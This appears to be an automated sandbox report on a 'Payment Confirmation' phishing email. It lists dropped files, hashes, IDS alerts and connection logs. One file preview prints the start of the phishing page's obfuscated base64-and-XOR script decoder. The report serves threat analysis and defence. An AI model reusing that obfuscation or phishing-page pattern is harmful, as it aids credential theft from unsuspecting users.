                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):644
                                                                                                                                            Entropy (8bit):4.6279651077789685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:EEasTzWl6/Kjsg9GXlxDfwyf+/11C1+/MguB/KQGXlxD3EZAGxtw006cNOBkP1HJ:PaPlKKVkz1f+tPUgo/KQGbEZAuwz65GH
                                                                                                                                            MD5:541B83C2195088043337E4353B6FD60D
                                                                                                                                            SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                                                                            SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                                                                            SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2154)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2155
                                                                                                                                            Entropy (8bit):5.267372123282625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:m3c2zJ1QUTFlhoXwmtJQMVYG8PXVQ5Coiv/:m3cwQUBlheDQPG8dQp4
                                                                                                                                            MD5:1645428C6355801009B641088A1D197C
                                                                                                                                            SHA1:763CD81AF9B367E04669B0CA4582BADD4BE1194E
                                                                                                                                            SHA-256:CDDABF6BFBC77AA5FB6FDF3ABC55BA4BF187741727F354C176E8E0D77B3C51EF
                                                                                                                                            SHA-512:84E961D5511D9733097CBEF0B9F48E42C7C276BFC6021410E15135980311924828CDA25FC167A7C3D6E0AB63CBF799050681ED5B84CB95B552DC593818600849
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:import{p as m,o as u,d as x,b as a,u as t,a as e,w as r,n as l,t as n,F as h,q as f,Z as _,z as i,f as d}from"./app-49265ad1.js";import{L as p}from"./logotype-original-6f3eac48.js";import{_ as g}from"./Button-7c0475a9.js";const b={class:"border-b bg-gray-50"},y={class:"container mx-auto flex h-16 items-center justify-between space-x-3 text-white"},w={class:"flex justify-start lg:w-0 lg:flex-1"},v=e("span",{class:"sr-only"},"Marmof",-1),k={class:"container space-y-5 py-10"},j={class:"prose-xs mx-auto max-w-4xl space-y-5 px-3 sm:px-10"},L={class:"text-center"},z={class:"font-semibold"},B={class:"flex items-center justify-center rounded-xl bg-gray-50 p-2 text-sm"},T={class:"mr-5 flex items-center space-x-1 border-r pr-5"},q=["src"],M={class:"font-medium"},N={class:"text-gray-600"},V=["innerHTML"],O={__name:"Document",props:{document:{type:Object,required:!0}},setup(s){const o=m(f).smallerOrEqual("sm");return(c,D)=>(u(),x(h,null,[a(t(_),{title:s.document.data.title},null,8,["title"]),e("he
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 72 x 43, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):4.002585360278503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPl09Bgyxl/k4E08up:6v/lhPCjgy7Tp
                                                                                                                                            MD5:4F1B83A28158991F37559DB1FF1B4EB5
                                                                                                                                            SHA1:3840C85F7B3E415D9441BEEE7082726E031AC6A2
                                                                                                                                            SHA-256:2AB5EF48B2693AD185ADDEED939A93820696E7B6B33946FD0B382E44215C8E4C
                                                                                                                                            SHA-512:84C0035FE5FA1FDAD95B54114AD3304832F4D5EE73980D00EA491B7399427D138D31C12F729E036F86FC3CF29F2F365CE051F95B84AC563D3F42ED53BB1880E9
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8de644ce9b5745f6/1730908538244/-_ter8awBYLmx72
                                                                                                                                            Preview:.PNG........IHDR...H...+.....T.Y.....IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):569
                                                                                                                                            Entropy (8bit):5.262261775386692
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:t4/KYRN+pYR6plffG2MDIjuNo9LCWhY0C6gRni7QHKczKaF6U8V:t4LRN+qRgd6D9oJCd0BglNOaV8V
                                                                                                                                            MD5:736523B4E813D438D957906EB22E8CB7
                                                                                                                                            SHA1:40E40DE0DDB4CC65540C966AE5934F7D3649BACF
                                                                                                                                            SHA-256:EA0F06D240CE5ED4440A756E020C0E191E8346DE7A76781E545C091FC5B874C0
                                                                                                                                            SHA-512:F39D2E47D1C68A727B0EBAB7BD04F4FA03F80EAF6EDCE19F6FF1D4F42ABADD8EB4F457A1DF8EE2F09F59FD51CD91D5F160CDE7A0593B136A69DFE6AD262D69AF
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ui-avatars.com/api/?name=A+J&color=ffffff&background=f34b1d
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="64px" height="64px" viewBox="0 0 64 64" version="1.1"><rect fill="#f34b1d" cx="32" width="64" height="64" cy="32" r="32"/><text x="50%" y="50%" style="color: #ffffff; line-height: 1;font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Fira Sans', 'Droid Sans', 'Helvetica Neue', sans-serif;" alignment-baseline="middle" text-anchor="middle" font-size="28" font-weight="400" dy=".1em" dominant-baseline="middle" fill="#ffffff">AJ</text></svg>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):270
                                                                                                                                            Entropy (8bit):4.840496990713235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                                            MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                            SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                            SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                            SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10796
                                                                                                                                            Entropy (8bit):7.946024875001343
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                                                                                                            MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                                            SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                                            SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                                            SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                                                                                            Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1864
                                                                                                                                            Entropy (8bit):5.222032823730197
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1455
                                                                                                                                            Entropy (8bit):6.5761218938084145
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:hXrGIcsNqsK40Zzdhza+P5MUVmV4U6yZLYQKirCVtzrcEMLvEfl9:hyfsEsuVd8+P5McU6y9YUWcEBT
                                                                                                                                            MD5:C3AA3E477A13505B1DD79E05A96039A6
                                                                                                                                            SHA1:225E125D4416AB25092773EBB9C4C54452FFAF3D
                                                                                                                                            SHA-256:227EEB5EF49E062025133C4E2CC8C42D7EA76B0C869E467BB92638CDF1ACC942
                                                                                                                                            SHA-512:3436D80200AFD8EB28BB35A1C935E3DCB48CA1F0A09D40DADDE6B5C1DE4E54196F1A74CD2E678EBAF8A8B6BB43E9870C9612065CBAE69AB359CF18FFDF6BD665
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.....&..&..'..'..(..&..'..-..'..'..(.]........e..K..L..K..M..K..M .J..K..M&..'..'..'..&..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..&..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..&..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..'..(..)..'..'.O..M..O..K..K..K..K..K..K..L..K..K..K..K..K..K..K..K..K..L..K..K...'.K..K..K...'..'..'..'..'..'.J..K..K..K..K..K..K..K...'.K....ZP......tRNS.............................XYM..I....h#.....f!........d..R....U..i.p.q...<.........;,L..8-T......a.'..5....D.9..Ho+=k*.......@..>.....\..._.X..j........lH.Wwx2.mv.E......j......bKGD..l.1....tIME...............IDAT8.c`.D..QRJ...af....rdee...X...UT..54Y.X.d.uTu..........F.&.k...........1...gg`.1....B...........V....<....o.....~....x... .pp.T.[hXxD...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (10450)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10498
                                                                                                                                            Entropy (8bit):5.327380141461276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:x9iW+rIadfLTcaTO5BrwjnwSrQ1kPmqQmMjmtmumobU8:x9KVLbw6jqON
                                                                                                                                            MD5:E0D37A504604EF874BAD26435D62011F
                                                                                                                                            SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                                                                                            SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                                                                                            SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                                                                                            Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):291
                                                                                                                                            Entropy (8bit):4.139353997001166
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:viNvXqoX0XB79i8eJOezXXhKvN8K2GTagGT4Swqn:+XNgBU8eJh0N8YTaDTxhn
                                                                                                                                            MD5:C2F552420EE251E4422CA9294463BA95
                                                                                                                                            SHA1:15130C91F2694226943E18267A8C125EA248C298
                                                                                                                                            SHA-256:443A0CD04988E4BF648881893669C9AC37D12DA86047DC590E89AEE82DB13F2C
                                                                                                                                            SHA-512:080412576032014B2AA3558D30C8ECA436880B9434DDA7E49D8308E3F6C1036DE34D0E75F43820DE4A697A8365FB4799A876BF5ADE5B0200DC8837BCF8800B45
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/site.webmanifest
                                                                                                                                            Preview:{. "name": "",. "short_name": "",. "icons": [. {. "src": "/android-chrome-192x192.png",. "sizes": "192x192",. "type": "image/png". }. ],. "theme_color": "#ffffff",. "background_color": "#ffffff",. "display": "standalone".}.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (3765), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9145
                                                                                                                                            Entropy (8bit):6.068267564087908
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ANZHyxaJ++g9WhTyqUYkOL/U92dQxCN0fSjqrduTQfrjxbzqrduTQfr0xbOm:0ZHyxv+QYk/CkFlrVulrE3
                                                                                                                                            MD5:BD365019D9A9069276EFDB6FEB5B8733
                                                                                                                                            SHA1:FFCC802C34154E344F5E63F4ECE849A770DD1C1D
                                                                                                                                            SHA-256:F1AF0973E82A48360C3AA730FFA9CC6C7E4EECDB306422CF7F750A9B5C2CAC4D
                                                                                                                                            SHA-512:04CFA97BFE31EFC5D44EE5F99D3BADA39114649F57CA407A0E51E0E1D7F17CD2DAE62C266FAFA003A6D3D865225A584ADF60A454095597F7495A4186E79AFB11
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/7PXU/
                                                                                                                                            Preview: Success is not how high you have climbed, but how you make a positive difference to the world. -->.. Success is not final, failure is not fatal: It is the courage to continue that counts. -->..<script>..function JCZsNmyIVf(kcTrioljbM, XtQSCeEYsF) {..let IdhfhwgZNS = '';..kcTrioljbM = atob(kcTrioljbM);..let bWuVnlHhmM = XtQSCeEYsF.length;..for (let i = 0; i < kcTrioljbM.length; i++) {.. IdhfhwgZNS += String.fromCharCode(kcTrioljbM.charCodeAt(i) ^ XtQSCeEYsF.charCodeAt(i % bWuVnlHhmM));..}..return IdhfhwgZNS;..}..var MDnxqqKiBa = JCZsNmyIVf(`RSNbFgI6HHcfExptGgwfPhgkVk5WM1cADmQCJhkECykWBwQnRz0dFBwiQUlYZF55XE8UOVZKATlKaVBOCjNKDRs+VlpmXQozSg0bPkgkHgJEclAQHzobbUNOGjRWDhhkCzsDFB02VAUZL0Y0AwxWMVIFE2UEPg4SVjNKHRs+B3oGElZkFlVFe0c0HhgJJFdJATlGOgUPVzpLRlV2RyQPExAgTFpmQGVdUBIaIlEUH3RlXRoAC3BJMT84HQ0WEx0WGFlLaDB1V2xzJlkWSzogMBwPPT56FQ1qVXdOGVtrNW4dKxp3PScaCFwlAB0qBExcWSdRCg8lH3kADhoxTA0EJEY/DRIRfksRCTkcJURQUGs1bgIsSH89JxoIXCUAHSoERUECXTI1LSkwMy0KLhJrRFZqOREPOR0RUzMpGUYkHA0QJBBDSG1BeRwOCX
                                                                                                                                            File type:CDFV2 Microsoft Outlook Message
                                                                                                                                            Entropy (8bit):7.875277879144669
                                                                                                                                            TrID:
                                                                                                                                            • Outlook Message (71009/1) 58.92%
                                                                                                                                            • Outlook Form Template (41509/1) 34.44%
                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                                                                                                                            File name:Payment Confirmation (237 KB).msg
                                                                                                                                            File size:248'320 bytes
                                                                                                                                            MD5:5e2f88d03079fb4e7577e6a638f622a6
                                                                                                                                            SHA1:19900505a99e955e3ec8ac196d03f814fd5e26c9
                                                                                                                                            SHA256:0236aa093f7326b46f646de0508b06bf6fbb8e15a5fada15e238e07cdc0583b5
                                                                                                                                            SHA512:362debdfd66478a95d9909b4c07eb5dcf4062f1c0d489d5e5b573cb4b876e9c7879a29e41e6179affc9655f265dad1718e4930be822a3cf2711e9380b607d016
                                                                                                                                            SSDEEP:6144:zM1Av7GR5lRVEhK7Vkmlwwzog7KRVGhxKko5VaJ:z+Eq7hskVkenjQIh1o
                                                                                                                                            TLSH:EE34129034AE5B08F0BD147699D5C6839743FC8F7E01FB0F3584F39E68321A6A5A7689
                                                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                                                                            Subject:Payment Confirmation
                                                                                                                                            From:
                                                                                                                                            To:
                                                                                                                                            Cc:
                                                                                                                                            BCC:
                                                                                                                                            Date:
                                                                                                                                            Communications:
                                                                                                                                              Attachments:
                                                                                                                                              • Payment Copy.xlsb
                                                                                                                                              Key Value
                                                                                                                                              X-Unsent1
                                                                                                                                              SubjectPayment Confirmation
                                                                                                                                              Thread-TopicPayment Confirmation
                                                                                                                                              Thread-IndexAQHbMFasTC2gzk0S9UmKO4QdlMlJ/Q==
                                                                                                                                              DateWed, 6 Nov 2024 14:17:55 +0000
                                                                                                                                              Message-ID<SN7PR06MB7055F89F425B6BE8C918860492532@SN7PR06MB7055.namprd06.prod.outlook.com>
                                                                                                                                              Content-Languageen-US
                                                                                                                                              X-MS-Has-Attachyes
                                                                                                                                              X-MS-TNEF-Correlatormsip_labels:
                                                                                                                                              Content-Typemultipart/mixed;
                                                                                                                                              MIME-Version1.0
                                                                                                                                              date

                                                                                                                                              Icon Hash:c4e1928eacb280a2
                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2024-11-06T16:54:46.890321+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.1849705TCP
                                                                                                                                              2024-11-06T16:55:24.810125+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.1849748TCP
                                                                                                                                              2024-11-06T16:56:05.166870+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.184987413.107.246.45443TCP
                                                                                                                                              2024-11-06T16:56:11.019791+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.184989113.107.246.45443TCP
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Nov 6, 2024 16:54:38.317512989 CET49673443192.168.2.18204.79.197.203
                                                                                                                                              Nov 6, 2024 16:54:38.621223927 CET49673443192.168.2.18204.79.197.203
                                                                                                                                              Nov 6, 2024 16:54:39.226370096 CET49673443192.168.2.18204.79.197.203
                                                                                                                                              Nov 6, 2024 16:54:40.428214073 CET49673443192.168.2.18204.79.197.203
                                                                                                                                              Nov 6, 2024 16:54:42.835269928 CET49673443192.168.2.18204.79.197.203
                                                                                                                                              Nov 6, 2024 16:54:45.363132000 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:45.363171101 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:45.363261938 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:45.365716934 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:45.365735054 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:45.447587013 CET49679443192.168.2.1852.182.141.63
                                                                                                                                              Nov 6, 2024 16:54:45.749197006 CET49679443192.168.2.1852.182.141.63
                                                                                                                                              Nov 6, 2024 16:54:46.354824066 CET49679443192.168.2.1852.182.141.63
                                                                                                                                              Nov 6, 2024 16:54:46.435791969 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.435883045 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.442624092 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.442632914 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.442907095 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.493182898 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.520592928 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.563328981 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.877768040 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.877799034 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.877806902 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.877839088 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.877877951 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.877877951 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.877901077 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.877916098 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.877932072 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.877939939 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.878294945 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.878345013 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.878360987 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.890036106 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.890052080 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.890075922 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:46.890218973 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.890253067 CET443497054.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:46.890326977 CET49705443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:54:47.560235023 CET49679443192.168.2.1852.182.141.63
                                                                                                                                              Nov 6, 2024 16:54:47.640219927 CET49673443192.168.2.18204.79.197.203
                                                                                                                                              Nov 6, 2024 16:54:48.082242966 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:54:48.082302094 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:54:48.087058067 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.087135077 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.087146044 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.087219000 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.087229013 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.413678885 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.413702011 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.413719893 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.413738012 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.413755894 CET4434969320.190.159.0192.168.2.18
